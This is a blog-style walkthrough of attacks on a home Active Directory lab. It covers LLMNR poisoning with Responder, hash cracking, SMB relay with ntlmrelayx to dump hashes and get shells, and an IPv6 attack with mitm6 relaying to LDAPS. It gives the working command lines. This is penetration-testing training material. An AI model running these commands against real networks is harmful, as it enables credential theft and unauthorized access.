AD Attack Lab Part Two (LLMNR poisoning, SMB relay, and IPv6 attack)
In part two of the AD attack lab series, we will learn how to perform LLMNR poisoning, SMB relay, and IPv6 attack against the AD environment. If you do not have the AD environment set up yet, you can go to the “AD attack lab part one” and follow the instruction to set the lab up. Note, I have changed my VMs spec in this lab. Currently, there are 4 VMs, they are Windows Server 2019, Windows 10 (2x), and Kali 2020.3. Each VMs assigned with 1 GB RAM and 1 Processor, and they all use the NAT network. If you do not have Kali installed yet, head over here to grab the latest version of Kali. Now, let’s dive into the lab setup.
wget https://bootstrap.pypa.io/get-pip.py sudo python get-pip.py wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz Extract the downloaded folder cd impacket/ pip install . sudo pip install .
Note, we will use Impacket 0.9.19 in this lab because of the compatible issue for some tools we are going to use. Also. notice that the Python2.7 is being used to install the pip so we will have the pip to use Python2.7.
Perform LLMNR poisoning
Start all the 4 VMs. In kali, start the “Responder” and use the eth0 in this case with a Verbose mode. In one of the Windows 10 client, log in and try to access the Kali machine from the network drive. Note, this is for the demonstration purpose that someone in the network typed in a wrong network drive, and Responder now responds to this wrong DNS request. Essentially, the Responder tells the machine that it is the legit DNS server and asks the Windows 10 machine to send the hash to it. Note, 192.168.200.160 is the IP of Kali.
- Start the Responder
sudo responder -I eth0 -rdwv
- Access our kali machine network drive from Windows 10
Note, if your computers not visible in the network, you need to go to “Services” and turn on “Function Discover Resource Publication”.
- Save the hash in a file, and use “Rockyou” and “Hashcat” to crack the hash
We see the Administrator’s password is “password”.
- Do a Nmap scan to see if the SMB signing is enforced
sudo nmap --script=smb2-security-mode.nse -p445 192.168.200.0/24
- Turn off SMB and HTTP servers in the Responder configuration file
- Start the Responder and “ntlmrelayx.py” in the Kail machine
Now, the received hash is being relayed to the target and used to dump the local hashes on the machine.
Shell Access via SMB relay
We can access the different shares in the shell includes C$ and ADMIN$
- Obtain a shell via Metasploit
Use the following module and set the variables as the following image shows:
- Obtain a shell via “psexec.py”
IPv6 Attack via MITM6
- Install mitm6
Note, the image shows I used Python3 but I changed to Python2.7 later.
- Install the LDAPS Certificate on server
Note, if you can not connect to the LDAPS, try troubleshooting. I have to roll back to the previous snapshot early and re-install the CA role because for some reason my LDAPS wasn’t installed for the first time.
- Start the “mitm6” and “ntlmrelayx.py” at the same time.
mitm6 -d kudos.local sudo ntlmrelayx.py -6 -t ldaps://192.168.200.153 -wh fakewpad.kudos.local -l lootme
In this post, we learned how to use LLMNR poisoning, SMB relay, and IPv6 attack to against the misconfigured AD environment. In the following posts, I will continue to discuss other ways to enumerate and attack the AD environment. Thank you for reading :)